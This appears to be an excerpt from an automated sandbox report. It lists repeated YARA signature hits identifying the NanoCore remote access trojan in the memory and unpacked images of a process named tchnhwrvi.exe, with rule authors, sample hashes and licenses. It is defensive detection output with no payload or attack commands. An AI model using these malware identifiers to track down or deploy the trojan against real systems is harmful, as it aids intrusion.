      Source: 00000002.00000002.571761394.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.571720723.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.571720723.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.571720723.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.567185811.00000000043A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.571671329.0000000007570000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.571671329.0000000007570000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.571671329.0000000007570000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.567185811.0000000004404000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.571793197.00000000075E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.571793197.00000000075E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.571793197.00000000075E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.571026013.0000000005E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.571026013.0000000005E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.571026013.0000000005E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.571597397.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.571597397.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.571597397.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.565935661.0000000003332000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.565935661.0000000003332000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.565935661.0000000003332000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.566066458.0000000003381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.571864347.0000000007610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.571864347.0000000007610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.571864347.0000000007610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.570873526.0000000005BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.570873526.0000000005BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.570873526.0000000005BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: tchnhwrvi.exe PID: 1312, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: tchnhwrvi.exe PID: 1312, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: tchnhwrvi.exe PID: 1312, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: PhviZrlpkW.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: 2.2.tchnhwrvi.exe.4f14bbe.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4f14bbe.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4f14bbe.11.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4f14bbe.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.73f0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.73f0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.73f0000.33.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.73f0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.43bc350.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.43bc350.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.43bc350.26.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.43bc350.26.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.75b0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75b0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75b0000.36.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.75b0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.7624c9f.42.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7624c9f.42.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7624c9f.42.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.7624c9f.42.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.75e0000.39.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75e0000.39.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75e0000.39.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.75e0000.39.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.34111c0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.34111c0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.34111c0.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.34111c0.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.7590000.35.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7590000.35.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7590000.35.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.7590000.35.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4f0678e.18.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4f0678e.18.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4f0678e.18.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4f0678e.18.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 1.2.tchnhwrvi.exe.b13658.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 1.2.tchnhwrvi.exe.b13658.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 1.2.tchnhwrvi.exe.b13658.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 1.2.tchnhwrvi.exe.b13658.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 1.2.tchnhwrvi.exe.b13658.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.441fa31.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.441fa31.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.441fa31.20.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.441fa31.20.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.73f0000.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.73f0000.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.73f0000.33.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.73f0000.33.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.7610000.41.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7610000.41.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
